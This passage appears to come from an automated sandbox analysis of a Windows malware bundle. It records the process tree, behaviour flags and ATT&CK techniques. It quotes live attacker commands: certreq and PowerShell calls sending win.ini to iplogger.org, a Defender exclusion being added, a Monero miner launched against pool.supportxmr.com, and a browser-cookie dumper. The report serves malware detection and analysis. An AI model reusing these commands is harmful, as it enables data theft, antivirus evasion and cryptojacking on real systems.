        tapinstall.exe install OemVista.inf tap0901
        9⤵
        
        PID:7108
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        8⤵
        
        PID:3880
        
        C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        8⤵
        
        PID:4228
      - C:\Users\Admin\AppData\Local\Temp\dqz352xuu3o\coebriwznk5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dqz352xuu3o\coebriwznk5.exe" testparams
        6⤵
        
        PID:4204
        
        C:\Users\Admin\AppData\Roaming\nteuxk31i0a\jnlf2jny3ys.exe
        
        "C:\Users\Admin\AppData\Roaming\nteuxk31i0a\jnlf2jny3ys.exe" /VERYSILENT /p=testparams
        7⤵
        
        PID:4940
        
        C:\Users\Admin\AppData\Local\Temp\is-550II.tmp\jnlf2jny3ys.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-550II.tmp\jnlf2jny3ys.tmp" /SL5="$302BC,404973,58368,C:\Users\Admin\AppData\Roaming\nteuxk31i0a\jnlf2jny3ys.exe" /VERYSILENT /p=testparams
        8⤵
        
        PID:4564
      - C:\Users\Admin\AppData\Local\Temp\fhkv13vihny\chashepro3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fhkv13vihny\chashepro3.exe" /VERYSILENT
        6⤵
        
        PID:4744
        
        C:\Users\Admin\AppData\Local\Temp\is-3H76H.tmp\chashepro3.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3H76H.tmp\chashepro3.tmp" /SL5="$102C2,2015144,58368,C:\Users\Admin\AppData\Local\Temp\fhkv13vihny\chashepro3.exe" /VERYSILENT
        7⤵
        
        PID:2036
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
        8⤵
        
        PID:2756
        
        C:\Windows\SysWOW64\certreq.exe
        
        certreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
        9⤵
        
        PID:5860
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/1aSny7"
        8⤵
        
        PID:5076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
        8⤵
        
        PID:4372
        
        C:\Program Files (x86)\JCleaner\Venita.exe
        
        "C:\Program Files (x86)\JCleaner\Venita.exe"
        8⤵
        
        PID:4520
        
        C:\Program Files (x86)\JCleaner\Venita.exe
        
        "{path}"
        9⤵
        
        PID:7140
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
        8⤵
        
        PID:4484
        
        C:\Windows\SysWOW64\certreq.exe
        
        certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
        9⤵
        
        PID:5924
        
        C:\Program Files (x86)\JCleaner\8.exe
        
        "C:\Program Files (x86)\JCleaner\8.exe"
        8⤵
        
        PID:4952
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c echo grYNxrw
        9⤵
        
        PID:5452
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c cmd < Nemica.sys
        9⤵
        
        PID:4584
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd
        10⤵
        
        PID:5664
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
        8⤵
        
        PID:752
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c "start https://iplogger.org/1EaGq7"
        8⤵
        
        PID:4800
        
        C:\Program Files (x86)\JCleaner\Abbas.exe
        
        "C:\Program Files (x86)\JCleaner\Abbas.exe"
        8⤵
        
        PID:4456
      - C:\Users\Admin\AppData\Local\Temp\0eagzllrzvl\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\0eagzllrzvl\app.exe" /8-23
        6⤵
        
        PID:3288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Red-Leaf"
        7⤵
        
        PID:5124
        
        C:\Program Files (x86)\Red-Leaf\7za.exe
        
        "C:\Program Files (x86)\Red-Leaf\7za.exe" e -p154.61.71.51 winamp-plugins.7z
        7⤵
        
        PID:6860
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Red-Leaf\app.exe" -map "C:\Program Files (x86)\Red-Leaf\WinmonProcessMonitor.sys""
        7⤵
        
        PID:7068
        
        C:\Program Files (x86)\Red-Leaf\app.exe
        
        "C:\Program Files (x86)\Red-Leaf\app.exe" -map "C:\Program Files (x86)\Red-Leaf\WinmonProcessMonitor.sys"
        8⤵
        
        PID:5220
        
        C:\Program Files (x86)\Red-Leaf\7za.exe
        
        "C:\Program Files (x86)\Red-Leaf\7za.exe" e -p154.61.71.51 winamp.7z
        7⤵
        
        PID:6180
        
        C:\Program Files (x86)\Red-Leaf\app.exe
        
        "C:\Program Files (x86)\Red-Leaf\app.exe" /8-23
        7⤵
        
        PID:3928
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:892
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /f /im chrome.exe
    3⤵
    PID:1516
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im chrome.exe
      4⤵
      Kills process with taskkill
      PID:3520
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"
  2⤵
  - Executes dropped EXE
  - Checks whether UAC is enabled
  PID:4184
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"
  2⤵
  - Executes dropped EXE
  PID:4792
- - C:\ProgramData\5930241.65
    "C:\ProgramData\5930241.65"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:3024
  - - C:\ProgramData\Windows Host\Windows Host.exe
      "C:\ProgramData\Windows Host\Windows Host.exe"
      4⤵
      Executes dropped EXE
      PID:4176
- - C:\ProgramData\2232003.24
    "C:\ProgramData\2232003.24"
    3⤵
    - Executes dropped EXE
    PID:4984
- - C:\ProgramData\7028980.77
    "C:\ProgramData\7028980.77"
    3⤵
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Drops startup file
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    PID:2204
  - - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 1
      4⤵
      PID:5376
- - C:\ProgramData\4743103.52
    "C:\ProgramData\4743103.52"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4036
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1728
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    PID:4424
- - C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    PID:6040

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:512
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A8F2098D0954EE1146E249050793BCC6 C
  2⤵
  - Loads dropped DLL
  PID:3616

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1924

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:2872

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5456

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6708

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4272

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:4856
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{21c4e103-c9e5-4e4a-bf2f-7324ad6b7d63}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:1228
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
  2⤵
  PID:6488

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:5168

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:5380

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:6848
- C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
  MaskVPNUpdate.exe /silent
  2⤵
  PID:7576

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:3120

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:4724

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6552

C:\Users\Admin\AppData\Local\Temp\12AF.tmp.exe
C:\Users\Admin\AppData\Local\Temp\12AF.tmp.exe
1⤵
PID:5844

C:\Users\Admin\AppData\Local\Temp\25BB.tmp.exe
C:\Users\Admin\AppData\Local\Temp\25BB.tmp.exe
1⤵
PID:8396
- C:\Users\Admin\AppData\Local\Temp\25BB.tmp.exe
  C:\Users\Admin\AppData\Local\Temp\25BB.tmp.exe
  2⤵
  PID:7720

C:\Users\Admin\AppData\Local\Temp\29F2.tmp.exe
C:\Users\Admin\AppData\Local\Temp\29F2.tmp.exe
1⤵
PID:10008

C:\Users\Admin\AppData\Local\Temp\3619.tmp.exe
C:\Users\Admin\AppData\Local\Temp\3619.tmp.exe
1⤵
PID:10152

C:\Users\Admin\AppData\Roaming\iddecib
C:\Users\Admin\AppData\Roaming\iddecib
1⤵
PID:188

C:\Users\Admin\AppData\Local\Temp\3C54.tmp.exe
C:\Users\Admin\AppData\Local\Temp\3C54.tmp.exe
1⤵
PID:4488

C:\Users\Admin\AppData\Local\Temp\4964.tmp.exe
C:\Users\Admin\AppData\Local\Temp\4964.tmp.exe
1⤵
PID:5460
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout 1
  2⤵
  PID:1940
- - C:\Windows\SysWOW64\timeout.exe
    timeout 1
    3⤵
    - Delays execution with timeout.exe
    PID:7192
- C:\Users\Admin\AppData\Local\Temp\4964.tmp.exe
  "C:\Users\Admin\AppData\Local\Temp\4964.tmp.exe"
  2⤵
  PID:7728
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 2464
  2⤵
  - Program crash
  PID:7824

C:\Users\Admin\AppData\Local\Temp\6EB0.tmp.exe
C:\Users\Admin\AppData\Local\Temp\6EB0.tmp.exe
1⤵
PID:10868

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:11224

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:10360

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6712

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:10840

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4572

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:11092

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5960

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3728

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6812

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7564

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7952
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 7952 -s 1452
  2⤵
  - Program crash
  PID:8208

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Bootkit

T1067

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery